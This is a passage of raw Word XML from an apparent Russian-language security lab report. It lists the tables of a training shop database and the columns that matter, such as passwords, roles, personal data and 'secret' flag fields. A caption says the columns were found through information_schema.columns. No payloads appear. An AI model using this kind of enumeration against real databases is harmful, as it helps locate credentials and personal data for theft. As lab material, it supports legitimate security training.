            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Таблицы схемы </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>public</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00223005" w14:paraId="7D9ECD52" w14:textId="77777777" w:rsidTr="00223005">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9895" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="55F6F195" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>users</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00223005" w14:paraId="07E9C8E2" w14:textId="77777777" w:rsidTr="00223005">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9895" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5037CE15" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>user_personal_info</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00223005" w14:paraId="6D594275" w14:textId="77777777" w:rsidTr="00223005">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9895" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2ECC43FE" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>product_categories</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00223005" w14:paraId="7C9187AC" w14:textId="77777777" w:rsidTr="00223005">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9895" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="145784E2" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>products</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00223005" w14:paraId="30D4472B" w14:textId="77777777" w:rsidTr="00223005">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9895" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="760ECCD0" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>orders</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00223005" w14:paraId="52882A82" w14:textId="77777777" w:rsidTr="00223005">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9895" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5ABAFCFC" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>payments</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00223005" w14:paraId="6F4856F6" w14:textId="77777777" w:rsidTr="00223005">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9895" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4CD3AAB2" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>favorite_products</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00223005" w14:paraId="53718C22" w14:textId="77777777" w:rsidTr="00223005">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9895" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="453D1593" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>reviews</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00223005" w14:paraId="65AC2F1E" w14:textId="77777777" w:rsidTr="00223005">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9895" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4619C520" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>price_history</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00223005" w14:paraId="0D15A207" w14:textId="77777777" w:rsidTr="00223005">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9895" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="19989194" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>shipping_addresses</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="11F5900E" w14:textId="77777777" w:rsidR="00223005" w:rsidRDefault="00223005" w:rsidP="00223005"/>
    <w:p w14:paraId="14A434B1" w14:textId="77777777" w:rsidR="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
      <w:pPr>
        <w:pStyle w:val="af5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A5F551E" wp14:editId="065104B1">
            <wp:extent cx="5832000" cy="2286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7_information_schema_columns.jpg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5832000" cy="2286538"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A862857" w14:textId="77777777" w:rsidR="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок 7 – Получение списка колонок через </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>information_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>schema.columns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="07C67ABC" w14:textId="77777777" w:rsidR="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
      <w:pPr>
        <w:pStyle w:val="ab"/>
      </w:pPr>
      <w:r w:rsidRPr="00223005">
        <w:t>Таблица 12 – Значимые таблицы и колонки</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af4"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2835"/>
        <w:gridCol w:w="7060"/>
      </w:tblGrid>
      <w:tr w:rsidR="00223005" w14:paraId="770AB814" w14:textId="77777777" w:rsidTr="00223005">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="645F2BC7" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Таблица</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7060" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="321F54F3" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Значимые колонки</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00223005" w14:paraId="2CA988DF" w14:textId="77777777" w:rsidTr="00223005">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7144D43E" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>users</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7060" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="788F4DD3" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>login</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>password</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>role</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00223005" w:rsidRPr="00223005" w14:paraId="7C490C5D" w14:textId="77777777" w:rsidTr="00223005">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7EF4982B" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>user_personal_info</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7060" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="087E9C91" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">login, name, address, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>phone_number</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>, secret</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00223005" w:rsidRPr="00223005" w14:paraId="635A50CB" w14:textId="77777777" w:rsidTr="00223005">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="196C33A3" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>products</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7060" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6705C4C3" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>article, name, category, price, stock, released, secret</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00223005" w:rsidRPr="00223005" w14:paraId="74D0D85F" w14:textId="77777777" w:rsidTr="00223005">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1ADA616D" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>reviews</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7060" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="46D858BB" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>review_id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">, article, login, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>review_text</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>, rating, secret</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00223005" w:rsidRPr="00223005" w14:paraId="016E63D6" w14:textId="77777777" w:rsidTr="00223005">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0B099792" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>orders</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7060" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0A08749D" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>order_id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>, login, status, secret</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00223005" w:rsidRPr="00223005" w14:paraId="0B4EB60F" w14:textId="77777777" w:rsidTr="00223005">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="02F8B015" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>payments</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7060" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1987D6F8" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>order_id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">, amount, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>payment_method</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>payment_status</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>, secret</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00223005" w:rsidRPr="00223005" w14:paraId="190618A9" w14:textId="77777777" w:rsidTr="00223005">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="65AB0CFD" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>favorite_products</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7060" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6E1E3C8E" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">login, article, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>added_date</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>, secret</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00223005" w:rsidRPr="00223005" w14:paraId="309FCBBA" w14:textId="77777777" w:rsidTr="00223005">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="19ECD5A7" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>price_history</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7060" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2DCD1B5F" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>history_id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>product_article</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>old_price</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>new_price</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>, secret</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
